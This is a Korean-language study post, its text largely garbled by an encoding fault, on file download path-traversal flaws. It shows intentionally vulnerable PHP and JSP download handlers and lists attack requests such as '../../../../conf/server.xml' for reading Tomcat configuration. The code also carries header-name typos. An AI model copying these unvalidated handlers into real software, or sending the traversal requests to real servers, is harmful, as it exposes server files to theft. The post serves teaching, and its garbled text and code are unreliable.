νμΌ μ λ‘λ μ·¨μ½μ
- -
νμΌ λ€μ΄λ‘λ μ·¨μ½μ μ΄λ ?
μ μμ μΈ νμΌ λ€μ΄λ‘λκ° μλ λΉμ μμ μΈ νμΌμ λ€μ΄λ‘λνμ¬ κ³΅κ²©
μ μμ μΈ νμΌ vs λΉ μ μμ μΈ νμΌ
[κ²½λ‘] μ°¨μ΄κ° μλ€.
μ μμ μΈ κ²½λ‘μμ λ€μ΄λ‘λκ° μλ μ§μ λ κ²½λ‘λ₯Ό λ²μ΄λ μμ λλ ν°λ¦¬λ‘ μ΄λνμ¬
μλ²μ λμ, μ½λ, μ€μ λ±μ νμΌμ μ‘°ννκ±°λ λ€μ΄ λ°λ νμ
C:\Users\kitri\Downloads
νμ¬ κ²½λ‘λ₯Ό κΈ°μ€μΌλ‘ CλλΌμ΄λΈμ Users λλ ν°λ¦¬λ‘ κ°κ³ μΆλ€
cd ../../
cd C:\Users
νμΌ λ€μ΄λ‘λ μ·¨μ½μ μ ν λ κ²½λ‘λ₯Ό μ΄λνλ λ°©λ²
1. κ²½λ‘ μ΄λ λ¬Έμ μ½μ (../)
2. κ²½λ‘ λ¬Έμ μ¬μ© ( μ λ κ²½λ‘ )
htdocs ( ν λλ ν°λ¦¬ )
- CSS
- JS
-Upload
-Download
νμΌ λ€μ΄λ‘λ κΈ°λ₯
download.jsp
downloadAction.jsp
downAction.jsp
sadfsdafl.co.kr/download.jsp?file=νμΌλͺ
νμΌλͺ μ κ²½μ° μ¬μ©μ μ λ ₯κ°μ΄λ€
λλΆλΆμ μ·¨μ½μ μ μ¬μ©μ μ λ ₯κ°μ λ°λλ°μ μΆλ°νλ€.
μ? λμ μλΉμ€λ₯Ό μ 곡νκΈ° μν΄ μ΄μ© μ μμ΄ μ λ ₯ κ°μ λ°μμΌ νλ€
μΉ μ¬μ΄νΈ κΈ°λ₯μλ λ€μ΄λ‘λ κΈ°λ₯μ΄ 1κ° μ΄μ λμ΄ μμΌλ©°
μ¬μ©μ μ λ ₯κ°μ λ°μΌλ©΄ μ§μ λ κ²½λ‘μμ μ§μ λ νμΌμ μ¬μ©μμκ² μ€λ€
νμΌ λ€μ΄λ‘λ κΈ°λ₯
λ°λμ νμν μ€λΉλ¬Ό
μΉ λλ ν°λ¦¬κ° λ°λμ μ‘΄μ¬ν΄μΌνλ©°, νμΌ λ€μ΄λ‘λ κΈ°λ₯μ νλ νμ΄μ§ νμ
μΉ λΈλΌμ°μ μμ μ§μλλ νμΌ νμ μ΄ λμ΄λ¨μ λ°λΌ URL μ κ·Ό μ νμ
νμΌ μ λ‘λλ₯Ό νλ©΄ -> μ λ‘λ ν΄λκ° μλ κ²½μ° νμΌ λ€μ΄λ‘λ κΈ°λ₯μ μ°Ύμ λ³Ό νμκ° μλ€
리λ μ€κ° νμΌ λ€μ΄λ‘λ μ·¨μ½μ μ μ‘°κΈ λ μ·¨μ½νλ€
μλμ°λ νν°μ μ΄ λ€ λλμ΄μ Έ μμΌλ―λ‘ λ€λ₯Έ λλΌμ΄λΈλ‘ λ³κ²½ λΆκ°ν¨
νμΌ λ€μ΄λ‘λ λ‘μ§
CλλΌμ΄λΈ download_vuln ν΄λμμ password.txt νμΌ μ½κΈ°
- μ§μ μ μΈ λ°©μ
www.kitri.re.kr/kitri/file/download.web?dir=/uploadfile/&filename=kitri_logo_Ko_En.jpg&siteDib=kitri
- κ°μ μ μΈ λ°©μ
λ°γ £ν° λ² μ΄μ€λ₯Ό νμ©νμ¬ νμΌ λ€μ΄λ‘λ
www.kitri.re.kr/dowload.web?idx=1
# index.php
<?php
header("Content-type : text/html; charset=UTF-8");
?>
<li>첨λΆνμΌ : <a href="./download.php?filename=test.jpg">[λ€μ΄λ‘λ]</a>
# download.php
<?php
$filename = $_GET["filename"];
$filepath = "upload/{$filename}";
header("Content-Type: application/octet.stream");
header("Conetnt-Dispositionl: attachement; filename={$filename}");
readfile($filepath);
?>
Original Filename & Real Filename
<%@ page contentType="text/html; charset=UTF-8" %>
<li>λ€μ΄λ‘λ1 : <a href="download1.jsp?org_filename=test.jpg&real_filename=abcd.jpg">[λ€μ΄λ‘λ1]</a></li>
<li>λ€μ΄λ‘λ2 : <a href="download2.jsp?path=image&org_filename=test.jpg&real_filename=abcd.jpg">[λ€μ΄λ‘λ2]</a></li>
<li>λ€μ΄λ‘λ3 : <a href="download3.jsp?path=C:/apache-tomcat-8.5.81/webapps/ROOT/upload/image/&org_filename=test.jpg&real_filename=abcd.jpg">[λ€μ΄λ‘λ3]</a></li>
# download.php
<?php
$org_filename = $_GET["org_filename"];
$real_filename = $_GET["real_filename"];
$filepath = "upload/{$org_filename}";
header("Content-Type: application/octet.stream");
header("Conetnt-Dispositionl: attachment; filename={$real_filename}");
readfile($filepath);
?>
# jsp original filename , real filename
# original filename = λ€μ΄ λ°μ λ λ¨λ νμΌ μ΄λ¦
# real filename = μλ μλ³Έ νμΌ μ΄λ¦
<%@ page contentType="text/html; charset=UTF-8" %>
<li>λ€μ΄λ‘λ1 : <a href="download1.jsp?org_filename=test.jpg&real_filename=abcd.jpg">[λ€μ΄λ‘λ1]</a></li>
<li>λ€μ΄λ‘λ2 : <a href="download2.jsp?path=image&org_filename=test.jpg&real_filename=abcd.jpg">[λ€μ΄λ‘λ2]</a></li>
<li>λ€μ΄λ‘λ3 : <a href="download3.jsp?path=C:\apache-tomcat-8.5.81\webapps\ROOT\upload\image&org_filename=test.jpg&real_filename=abcd.jpg">[λ€μ΄λ‘λ3]</a></li>
# original filenameκ³Ό real filenameμΌλ‘
# download1.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
FileInputStream fis = null; // byte ννλ‘ νμΌ λ³΅μ¬(input) & λΆμ¬λ£κΈ°(output)
BufferedInputStream bis = null; // bufferμ μ μ₯μμΌμ 1 byte μ© μ¬μ© κ°μ Έμ€κΈ°
BufferedOutputStream bos = null; // bufferμ μ μ₯μμΌμ 1 byte μ© μ¬μ© 보λ΄κΈ°
String path ="C:\\apache-tomcat-8.5.81\\webapps\\ROOT\\upload\\image\\";
String org_filename = request.getParameter("org_filename");
String real_filename = request.getParameter("real_filename");
if(org_filename == null || real_filename == null){
out.println("<script>alert('νμΌλͺ
μ΄ μ
λ ₯λμ§ μμμ΅λλ€.');histroy.back(-1);</script>");
return;
}
try{
File fd = new File(path + real_filename); // real_filenameκ³Ό μ£Όμλ₯Ό fdμ μ μ₯
if(!fd.exists()){
out.println("<script>alert('νμΌμ΄ μ‘΄μ¬νμ§ μμ΅λλ€.');history.back(-1);</script>");
}
response.setHeader("Content-Type", "application/octect-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);
fis = new FileInputStream(fd);
bis = new BufferedInputStream(fis);
bos = new BufferedOutputStream(response.getOutputStream());
byte[] buffer = new byte[1024];
int i = 0;
while((i=(bis.read(buffer))) != -1){ // bufferκ° ν
λΉλκΉμ§ λ°λ³΅
bos.write(buffer,0,i);
}
bos.flush();
}finally{
if(fis != null) fis.close();
if(bis != null) bis.close();
if(bos != null) bos.close();
}
%>
# file pathκ° μΌλΆλ§ λ
ΈμΆ
# download2.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
FileInputStream fis = null;
BufferedInputStream bis = null;
BufferedOutputStream bos = null;
String path_temp = request.getParameter("path");
String org_filename = request.getParameter("org_filename");
String real_filename = request.getParameter("real_filename");
String path ="C:\\apache-tomcat-8.5.81\\webapps\\ROOT\\upload\\" + path_temp + "\\";
if(org_filename == null || real_filename == null){
out.println("<script>alert('νμΌλͺ
μ΄ μ
λ ₯λμ§ μμμ΅λλ€.');histroy.back(-1);</script>");
return;
}
try{
File fd = new File(path + real_filename);
if(!fd.exists()){
out.println("<script>alert('νμΌμ΄ μ‘΄μ¬νμ§ μμ΅λλ€.');history.back(-1);</script>");
}
response.setHeader("Content-Type", "application/octect-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);
fis = new FileInputStream(fd);
bis = new BufferedInputStream(fis);
bos = new BufferedOutputStream(response.getOutputStream());
byte[] buffer = new byte[1024];
int i = 0;
while((i=(bis.read(buffer))) != -1){
bos.write(buffer,0,i);
}
bos.flush();
}finally{
if(fis != null) fis.close();
if(bis != null) bis.close();
if(bos != null) bos.close();
}
%>
# λͺ¨λ file pathκ° λ
ΈμΆ
# download3.jsp
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.util.*, java.io.*"%>
<%
FileInputStream fis = null;
BufferedInputStream bis = null;
BufferedOutputStream bos = null;
String path = request.getParameter("path");
String org_filename = request.getParameter("org_filename");
String real_filename = request.getParameter("real_filename");
if(org_filename == null || real_filename == null){
out.println("<script>alert('νμΌλͺ
μ΄ μ
λ ₯λμ§ μμμ΅λλ€.');histroy.back(-1);</script>");
return;
}
try{
File fd = new File(path + real_filename);
if(!fd.exists()){
out.println("<script>alert('νμΌμ΄ μ‘΄μ¬νμ§ μμ΅λλ€.');history.back(-1);</script>");
}
response.setHeader("Content-Type", "application/octect-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + org_filename);
fis = new FileInputStream(fd);
bis = new BufferedInputStream(fis);
bos = new BufferedOutputStream(response.getOutputStream());
byte[] buffer = new byte[1024];
int i = 0;
while((i=(bis.read(buffer))) != -1){
bos.write(buffer,0,i);
}
bos.flush();
}finally{
if(fis != null) fis.close();
if(bis != null) bis.close();
if(bos != null) bos.close();
}
%>
Original Filename : λ΄κ° λ€μ΄ λ°κ±°λ μ λ‘λ ν λ νμΌ μ΄λ¦
Real Filename : μΉ μλ²μ μ μ₯λμ΄ μλ νμΌ μ΄λ¦
곡격 λ°©λ²
CASE 1 μ¬μ©μλ‘ μ λ ₯λ°λκ²μ΄ νμΌλͺ λ§ μ‘΄μ¬ν λ
μ μ μμ² : /download1.jsp?filename=abcd.jpg
곡격 μμ² : /download1.jsp?filename=../../../../conf/server.xml
CASE 2 μ¬μ©μλ‘ μ λ ₯ λ°λ κ²μ΄ μΌλΆ κ²½λ‘μ νμΌλͺ λ§ μ‘΄μ¬ν λ
μ μ μμ² : /download2.jsp?path=image&filename=abcd.jpg
곡격 μμ²1 : /download2.jsp?path=../../../conf&filename=server.xml
곡격 μμ²2 : /download2.jsp?path=../../../conf/server.xml&filename=
곡격 μμ²3 : /download2.jsp?path=image&filename=../../../../conf/server.xml
CASE 3 μ¬μ©μλ‘ μ λ ₯λ°λ κ²μ΄ μ λ κ²½λ‘μΌ λ
μ μ μμ² : /download3.jsp?path=C:/apache-tomcat-8.5.81/webapps/ROOT/upload/image/&org_filename=test.jpg&real_filename=abcd.jpg
곡격 μμ²1 : /download3.jsp?path=C:/apache-tomcat-8.5.81/conf/&org_filename=test.xml&real_filename=server.xml
linux
cd /etc/networks (o)
cd \etc\networks (x)
windows
cd C:\windows\system32 (o)
cd C:/windows/system32 (o)
'π Secure' μΉ΄ν κ³ λ¦¬μ λ€λ₯Έ κΈ
file download μ¬ν 곡격 (0) | 2022.07.19 |
---|---|
νμΌ λ€μ΄λ‘λ 곡격μ μν νλ‘μΈμ€ (0) | 2022.07.18 |
XSS 곡격 - μΈμ κ° , ν€ λ‘κΉ (0) | 2022.07.14 |
SESSION High jacking (0) | 2022.07.14 |
XSS μ°ν 곡격 (0) | 2022.07.14 |
μμ€ν κ³΅κ° κ°μ¬ν©λλ€